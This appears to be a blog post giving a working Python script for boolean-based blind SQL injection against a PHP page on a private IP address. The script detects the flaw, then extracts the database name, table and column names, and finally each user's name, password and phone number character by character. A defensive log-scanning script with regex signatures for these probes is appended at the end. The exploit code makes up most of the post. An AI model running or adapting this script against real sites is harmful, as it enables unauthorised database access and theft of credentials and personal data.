Boolean-based blind SQL injection (code still to be simplified)
2022-08-03 05:22:00 【wuqinghalasao】
import requests, time, string

# Locate the injection point: compare a false condition with a true one
paylode1 = "?id=1 and 1=2"
paylode2 = "?id=1 and 1=1"
url = "http://192.168.28.133/boke/aupdata.php"
# Response for the false condition (the original never fetched it, so `response` was undefined)
res0 = requests.get(f'{url}{paylode1}')
response = res0.text
# Fetch the reference (true-condition) response
res1 = requests.get(f'{url}{paylode2}')
response1 = res1.text
# print(response1)
if len(response) == len(response1):
    print('不存在布尔漏洞')
else:
    print('存在布尔注入漏洞,判断数据库长度')
    a1 = 0
    for a in range(6):
        res2 = requests.get(f'{url}?id=1 and length(database())={a}-- -')
        response3 = res2.text
        if len(response3) == len(response1):
            a1 = a
            print(f"数据库长度为{a},开始爆破库名和表名")
            break
    low = string.ascii_lowercase
    res4 = ''
    # MySQL substr() positions are 1-based; the original started at 0 and wasted one round
    for a2 in range(1, a1 + 1):
        for a3 in low:
            res3 = requests.get(f"{url}?id=1 and (substr(database(),{a2},1))='{a3}' -- -")
            response4 = res3.text
            if len(response4) == len(response1):
                res4 += a3
    print(f'数据库名为{res4}')
    # Count the tables
    a5 = 0
    for a4 in range(10):
        res5 = requests.get(f"{url}?id=1 and (SELECT count(table_name) from information_schema.tables where table_schema='{res4}')={a4}-- -")
        response5 = res5.text
        # print(response5)
        if len(response5) == len(response1):
            a5 = a4
    res8 = []
    # Extract the table names
    for a6 in range(a5):
        res7 = ''
        for a7 in range(1, 10):
            for a8 in low:
                # print(a6,a7,a8)
                res6 = requests.get(f"{url}?id=1 and substr((SELECT table_name from information_schema.tables where table_schema='{res4}' LIMIT {a6},1),{a7},1)='{a8}'-- -")
                response6 = res6.text
                if len(response6) == len(response1):
                    res7 += a8
        res8.append(res7)
    print(f'数据库{res4}有{res8}表')
    # Walk the tables
    res13 = []
    for a9 in res8:
        dic = {}
        # Count the columns
        for a10 in range(9):
            res9 = requests.get(f"{url}?id=1 and (SELECT count(column_name) FROM information_schema.columns where table_schema='{res4}' and table_name='{a9}')={a10}")
            response7 = res9.text
            if len(response7) == len(response1):
                # print(a10) 3,8,4,6,7
                res12 = []
                # Iterate by column count, which is a10
                for a11 in range(a10):
                    res10 = ''
                    # Iterate over each column name's length
                    for a12 in range(1, 10):
                        # Test each character of the column name
                        for a13 in low:
                            res11 = requests.get(f"{url}?id=1 and substr((SELECT column_name FROM information_schema.columns where table_schema='{res4}' and table_name='{a9}' limit {a11},1),{a12},1)='{a13}'-- -")
                            response8 = res11.text
                            if len(response8) == len(response1):
                                res10 += a13
                    res12.append(res10)
                dic[a9] = res12
        res13.append(dic)
    print(f'库表对应{res13}')
    # Get the row count of the user table
    a15 = 0
    for a14 in range(1, 3):
        res14 = requests.get(f"{url}?id=1 and (select count(*) from stu) ={a14}")
        response9 = res14.text
        if len(response9) == len(response1):
            a15 = a14
            break
    # Iterate over username, password and phone number
    loww = 'abcdefghijklmnopqrstuvwxyz,1234567890'
    res17 = []
    for a16 in range(a15):
        res16 = ''
        for a17 in range(1, 25):
            for a18 in loww:
                res15 = requests.get(f"{url}?id=1 and substr((select concat_ws(',',sname,password,phone) from stu limit {a16},1),{a17},1) ='{a18}'")
                response10 = res15.text
                if len(response10) == len(response1):
                    res16 += a18
        res17.append(res16)
    print(f'用户名,密码,电话为{res17}')
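As an added defender-side example (not part of the original post): the enumeration above leaves a distinctive trail in the web server's access log, one request per guessed character with responses alternating between two sizes. This script assumes a combined-format log and constructs its own sample lines; it flags clients that hit several of the probe patterns shown on this page while their responses toggle between two sizes.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page): the shape the script above
# produces, plus one benign client (192.168.28.11) that should not be flagged.
SAMPLE_LOG = """\
192.168.28.10 - - [03/Aug/2022:05:22:00 +0800] "GET /boke/aupdata.php?id=1%20and%201=2 HTTP/1.1" 200 512
192.168.28.10 - - [03/Aug/2022:05:22:00 +0800] "GET /boke/aupdata.php?id=1%20and%201=1 HTTP/1.1" 200 734
192.168.28.10 - - [03/Aug/2022:05:22:01 +0800] "GET /boke/aupdata.php?id=1%20and%20length(database())=3--%20- HTTP/1.1" 200 512
192.168.28.10 - - [03/Aug/2022:05:22:01 +0800] "GET /boke/aupdata.php?id=1%20and%20(substr(database(),1,1))='a'%20--%20- HTTP/1.1" 200 512
192.168.28.10 - - [03/Aug/2022:05:22:02 +0800] "GET /boke/aupdata.php?id=1%20and%20(SELECT%20count(table_name)%20from%20information_schema.tables%20where%20table_schema='boke')=2--%20- HTTP/1.1" 200 734
192.168.28.11 - - [03/Aug/2022:05:23:00 +0800] "GET /boke/aupdata.php?id=7 HTTP/1.1" 200 734
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"GET (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+)')

# Each signature corresponds to one stage of the enumeration on this page
SIGNATURES = {
    "tautology_pair": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "db_length":      re.compile(r"length\s*\(\s*database\s*\(\s*\)\s*\)", re.I),
    "char_probe":     re.compile(r"substr\s*\(", re.I),
    "schema_walk":    re.compile(r"information_schema\.(tables|columns)", re.I),
}

def scan_log(text):
    """Per client IP: how often each signature matched the decoded query string,
    and the set of response sizes seen on those matching requests."""
    report = defaultdict(lambda: {"hits": defaultdict(int), "sizes": set()})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = unquote(m.group("path").partition("?")[2])
        matched = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if matched:
            entry = report[m.group("ip")]
            for name in matched:
                entry["hits"][name] += 1
            entry["sizes"].add(int(m.group("size")))
    return {ip: {"hits": dict(v["hits"]), "sizes": v["sizes"]} for ip, v in report.items()}

def suspicious_clients(text, min_signatures=2):
    """IPs that triggered at least `min_signatures` distinct signatures and whose
    matching responses came back in two or more sizes (the true/false oracle)."""
    return sorted(ip for ip, v in scan_log(text).items()
                  if len(v["hits"]) >= min_signatures and len(v["sizes"]) >= 2)
```

The size-alternation check is what separates a blind-injection loop from a one-off scanner hit; tune `min_signatures` and add a request-rate threshold for production logs.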